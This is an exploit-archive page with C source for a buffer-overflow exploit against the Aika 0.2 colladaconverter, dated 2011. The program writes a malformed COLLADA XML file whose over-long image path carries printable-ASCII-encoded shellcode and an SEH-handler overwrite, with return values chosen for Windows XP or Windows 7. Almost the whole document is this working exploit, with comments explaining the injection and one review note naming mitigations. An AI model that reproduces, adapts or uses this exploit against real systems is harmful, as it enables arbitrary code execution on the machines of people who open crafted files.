
Aika 0.2 Buffer Overflow

Aika 0.2 Buffer Overflow
Posted Sep 12, 2011
Authored by isciurus

Aika version 0.2 colladaconverter XML parsing buffer overflow exploit.

tags | exploit, overflow
SHA-256 | a7a17f1f548e492db73c5689f2ece765a34e3dcc5f59cd06d8259bf3bf35ba9e

Aika 0.2 Buffer Overflow

/*
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
# Exploit Title: Aika colladaconverter buffer overflow exploit
# Date: 09/11/2011
# Author: isciurus
# Software Link: http://aika.googlecode.com/files/aika-v02.zip
# Version: 0.2
# Tested on: Windows 7 x64

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/gpl-3.0.html>.

//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
*/

#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <windows.h>
#include "string.h"

/*
 * Payload already transformed into printable ASCII (499 bytes; the <comments>
 * element in the template below names the encoder the author used). main()
 * copies it over the 644-byte run of 'S' filler inside the first <init_from>
 * path and refuses anything longer, so the patch never grows the template.
 */
char printableASCIIShellcode[] = // encoded 499 bytes
"WUQQUj3hKzJYSaRYjVCX4VGRH4z0BfXRQPPZjQX4QP2BM0BMX2Ai0BMXYZPOCKHG" // will be injected inside the file path ---------
"OHOCHGCKHKkAgFCBMGKJEA3Ag2Bg0BgABE94ku2QmAiAszHthbzMIMQ8Uz9TFQWC" // |
"GDNW6jYeJ8l47kSCPlKPRZljwLskRH6RQ0OiKjRENz4TUYHTfu6rjMTi1NAjGwMF" // |
"RHxIjxgzoZnVXlGIXJbCJYhxKHXKvjyFXDDLbNydxzXT3vTJdfa7Hpp3VM1jUOVv" // |
"UJYuPT3vkOQIPYGxa6Rk6NOaV9PEH56Mrrz5ZSPLOAvKIsFOCbfqWBRXPCNWSmJf" // |
"EVCXNoYNR9oDOaWoykz1Ev3TxcSHQz4ZOOLxlGBjsDGWGJs1EOCNqaAAOWHAMWCx" // |
"JEFIrTQ70vEFELaCIPPAPP0GUSmGfq1ZioUNQQATGCISZuJHNKRnlC3baNSAvIRO" // |
"HLvt4zVFHLkLxBQR5XsKpEN90RgdBZlNmISLELGsEL0myBVKzJY"; // |
// |
/*
 * COLLADA document template that main() writes to disk (sizeof(xml) - 1 bytes,
 * binary mode, NUL not written). Three regions are patched in place before
 * writing, never past their own width, so no surrounding byte moves:
 *   - the run of 'S' in the first <init_from> path -> printableASCIIShellcode
 *   - "ADDR_1" and "ADDR_2" (6 chars each)          -> "%40%02" (Windows 7) or "%40%01" (XP)
 * The author's arrows below mark what each region is for. An over-long
 * <init_from> path is the trigger (see the page title and the notes at the
 * 'A' filler); the root-cause fix belongs in the converter's path handling.
 */
char xml[] = // |
"<?xml version=\"1.0\" encoding=\"utf8\"?>" // |
"<COLLADA xmlns=\"http://www.collada.org/2005/11/COLLADASchema\" version=\"1.4.1\">" // |
"<asset>" // |
" <contributor>" // |
" <author>isciurus</author>" // |
" <comments>The shellcode encoded with http://www.exploit-db.com/exploits/13286/</comments>" // |
" </contributor>" // |
" <created>2011-09-04T22:29:59Z</created>" // |
" <modified>2011-09-04T22:29:59Z</modified>" // |
" <unit meter=\"0.01\" name=\"centimeter\"/>" // |
" <up_axis>Y_UP</up_axis>" // |
"</asset>" // |
"<library_cameras>" // |
" <camera id=\"cameraShape1\" name=\"cameraShape1\">" // |
" <optics>" // |
" <technique_common>" // |
" <perspective>" // |
" <yfov>37.8492</yfov>" // |
" <aspect_ratio>1.5</aspect_ratio>" // |
" <znear>1</znear>" // |
" <zfar>10000</zfar>" // |
" </perspective>" // |
" </technique_common>" // |
" </optics>" // |
" </camera>" // |
"</library_cameras>" // |
"<library_lights></library_lights>" // |
"<library_images>" // |
" <image id=\"file2\" name=\"file2\" depth=\"1\">" // |
" <init_from>E:\\aika\\" // <---------------------------
// 644 bytes of 'S' filler: the destination of the shellcode copy in main().
// main() rejects a payload whose sizeof (string length + NUL) exceeds 644.
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
"SSSSSSSSSSSSSSADDR_1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
// ^
// |
// ------------------------------------------------- the shellcode will be copied at this address
"AAAAA"
" </init_from>"
" </image>"
" <image id=\"file3\" name=\"file3\" depth=\"1\">"
" <init_from>E:\\aika\\"
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
"BBBBBBBBADDR_2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
// ^
// |
// -------------------------------------------------------- these bytes will overwrite SEH handler
// NOTE(review): the author describes an SEH-handler overwrite; SEHOP/SafeSEH
// are the platform mitigations aimed at exactly this class of corruption, and
// a bounded copy of the <init_from> value in the converter removes the trigger.
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" // this part forces the application to write outside
"AAAAAAAAAAAAAAAAAAAA" // the stack and triggers AV exception
" </init_from>"
" </image>"
"</library_images>"
"<library_materials>"
" <material id=\"blinn3\" name=\"blinn3\">"
" <instance_effect url=\"#blinn3-fx\"/>"
" </material>"
"</library_materials>"
"<library_geometries>"
" <geometry id=\"LOD3spShape-lib\" name=\"LOD3spShape\">"
" <mesh>"
" <source id=\"LOD3spShape-lib-positions\" name=\"position\">"
" <technique_common>"
" <accessor count=\"2108\" offset=\"0\" source=\"#LOD3spShape-lib-positions-array\" stride=\"3\">"
" <param name=\"X\" type=\"float\"/>"
" <param name=\"Y\" type=\"float\"/>"
" <param name=\"Z\" type=\"float\"/>"
" </accessor>"
" </technique_common>"
" </source>"
" <source id=\"LOD3spShape-lib-normals\" name=\"normal\">"
" <technique_common>"
" <accessor count=\"2290\" offset=\"0\" source=\"#LOD3spShape-lib-normals-array\" stride=\"3\">"
" <param name=\"X\" type=\"float\"/>"
" <param name=\"Y\" type=\"float\"/>"
" <param name=\"Z\" type=\"float\"/>"
" </accessor>"
" </technique_common>"
" </source>"
" <source id=\"LOD3spShape-lib-map1\" name=\"map1\">"
" <technique_common>"
" <accessor count=\"2277\" offset=\"0\" source=\"#LOD3spShape-lib-map1-array\" stride=\"2\">"
" <param name=\"S\" type=\"float\"/>"
" <param name=\"T\" type=\"float\"/>"
" </accessor>"
" </technique_common>"
" </source>"
" <vertices id=\"LOD3spShape-lib-vertices\">"
" <input semantic=\"POSITION\" source=\"#LOD3spShape-lib-positions\"/>"
" </vertices>"
" <triangles count=\"4212\" material=\"blinn3SG\">"
" <input offset=\"0\" semantic=\"VERTEX\" source=\"#LOD3spShape-lib-vertices\"/>"
" <input offset=\"1\" semantic=\"NORMAL\" source=\"#LOD3spShape-lib-normals\"/>"
" <input offset=\"2\" semantic=\"TEXCOORD\" source=\"#LOD3spShape-lib-map1\" set=\"0\"/>"
" <p>375</p>"
" </triangles>"
" </mesh>"
" </geometry>"
"</library_geometries>"
"<scene>"
" <instance_visual_scene url=\"#VisualSceneNode\"/>"
"</scene>"
"</COLLADA>";

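/*
 * Overwrite the first occurrence of `marker` inside `buf` with `len` bytes
 * taken from `repl`. No terminator is written: this is an in-place patch of a
 * larger NUL-terminated buffer, and the caller guarantees `len` fits.
 *
 * Returns 0 on success, -1 when `marker` is not present (the original code
 * dereferenced the NULL from strstr() in that case).
 */
static int patch_at(char *buf, const char *marker, const char *repl, size_t len)
{
    char *at = strstr(buf, marker);
    if (at == NULL) {
        return -1;
    }
    memcpy(at, repl, len);
    return 0;
}

/*
 * Build the malformed COLLADA file and write it to argv[1].
 *
 * Steps: check argc, refuse a payload longer than the 'S' run reserved in
 * xml[], ask which Windows version is in use (this selects the 6-char value
 * written over ADDR_1/ADDR_2), patch the three placeholders in place, then
 * write xml[] without its NUL to argv[1] in binary mode.
 *
 * Every path returns 0, as in the original; failures are reported on stdout.
 */
int main(int argc, char **argv)
{
    FILE *xml_file = NULL;
    int win7 = 0;
    const char *addr = NULL;                      /* value written over ADDR_1 and ADDR_2 */
    const size_t payload_len = sizeof(xml) - 1;   /* the NUL is not written to disk */

    if (argc < 2) {
        printf("\nUsage: aika_bof <malformed_collada_xml_path>");
        return 0;
    }

    /* xml[] reserves 644 'S' bytes. sizeof counts the NUL, so this check is
     * conservative by one: a 644-char payload is rejected although it would fit. */
    if (sizeof(printableASCIIShellcode) > 644) {
        printf("\nSorry, the shellcode is too long, 644 chars is maximum");
        return 0;
    }

    for (;;) {
        int c;

        printf("\nChoose OS version ([X] for Windows XP, [7] for Windows 7):");
        fflush(stdout);
        c = getchar();

        /* Drop the rest of the line so the trailing newline is not reported
         * as a second "Unknown OS version". */
        if (c != EOF && c != '\n') {
            int rest;
            while ((rest = getchar()) != EOF && rest != '\n') {
            }
        }

        /* The original looped forever on EOF: tolower(EOF) never matches. */
        if (c == EOF) {
            printf("\nNo answer read from stdin");
            return 0;
        }

        c = tolower((unsigned char)c);
        if (c == 'x') {
            win7 = 0;
            break;
        }
        if (c == '7') {
            win7 = 1;
            break;
        }
        printf("\nUnknown OS version");
    }

    printf("\n[*] Injecting the shellcode into the xml...");

    /* The payload replaces the start of the 'S' run; the remaining filler stays. */
    if (patch_at(xml, "SSSSSSSSSSSSSSSSSSSSSSSSSSSS", printableASCIIShellcode,
                 sizeof(printableASCIIShellcode) - 1) != 0) {
        printf("\nerror: shellcode placeholder not found in the xml template");
        return 0;
    }

    /* Both placeholders are 6 chars wide and receive the same 6-char value. */
    addr = win7 ? "%40%02" : "%40%01";
    if (patch_at(xml, "ADDR_1", addr, strlen(addr)) != 0 ||
        patch_at(xml, "ADDR_2", addr, strlen(addr)) != 0) {
        printf("\nerror: address placeholder not found in the xml template");
        return 0;
    }

    printf("done");

    /* %lu with a cast: the original passed a size_t to %d, which is undefined,
     * and reported sizeof(xml) although one byte fewer is written. */
    printf("\n[*] Writing %lu bytes to %s...", (unsigned long)payload_len, argv[1]);

    xml_file = fopen(argv[1], "wb");
    if (xml_file == NULL) {
        printf("\nerror while opening %s", argv[1]);
        return 0;
    }

    if (fwrite(xml, 1, payload_len, xml_file) != payload_len) {
        printf("\nerror while writing into %s", argv[1]);
        fclose(xml_file);
        return 0;
    }

    /* fclose() flushes the stdio buffer; a failure here means a short file. */
    if (fclose(xml_file) != 0) {
        printf("\nerror while closing %s", argv[1]);
        return 0;
    }

    printf("done");
    return 0;
}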
